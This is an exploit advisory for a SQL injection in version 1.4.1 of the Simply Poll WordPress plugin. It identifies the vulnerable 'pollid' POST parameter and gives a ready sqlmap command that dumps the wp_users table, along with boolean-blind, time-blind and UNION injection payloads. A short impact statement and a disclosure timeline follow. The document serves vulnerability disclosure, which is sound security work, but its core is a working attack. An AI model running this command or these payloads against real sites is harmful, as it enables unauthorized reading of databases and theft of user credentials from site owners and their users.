# Exploit Title: Simply Poll 1.4.1 Plugin for WordPress A SQL Injection
# Date: 21/12/2016
# Exploit Author: TAD GROUP
# Vendor Homepage: https://wordpress.org/plugins/simply-poll/
# Software Link: https://wordpress.org/plugins/simply-poll/
# Contact: info@tad.bg
# Website: http://tad.bg <http://tad.bg/>
# Category: Web Application Exploits
 
1 - Description
 
An unescaped parameter was found in Simply Poll version 1.4.1. ( WP
plugin ). An attacker can exploit this vulnerability to read from the
database.
The POST parameter 'pollid' is vulnerable.
 
 
2. Proof of Concept
 
  sqlmap -u "http://example.com/wp-admin/admin-ajax.php"
--data="action=spAjaxResults&pollid=2" --dump -T wp_users -D wordpress
--threads=10 --random-agent --dbms=mysql --level=5 --risk=3
 
Parameter: pollid (POST)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: action=spAjaxResults&pollid=2 AND 6034=6034
 
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind
     Payload: action=spAjaxResults&pollid=2 AND SLEEP(5)
 
     Type: UNION query
     Title: Generic UNION query (NULL) - 7 columns
     Payload: action=spAjaxResults&pollid=-7159 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7171,0x55746570525a68726d4a634844657
9564f524752646c786a5451775272645a6e734b766657534c44,0x7162627171),NULL--
CfNO
 
 
3. Attack outcome:
 
An attacker can read arbitrary data from the database. If the webserver
is misconfigured, read & write access the filesystem may be possible.
 
 
4 Impact:
 
Critical
 
 
5. Affected versions:
 
<= 1.4.1
 
6. Disclosure Timeline:
 
21-Dec-2016 A found the vulnerability
21-Dec-2016 A informed the developer
28-Dec-2016 A release date of this security advisory
 
Not fixed at the date of submitting that exploit.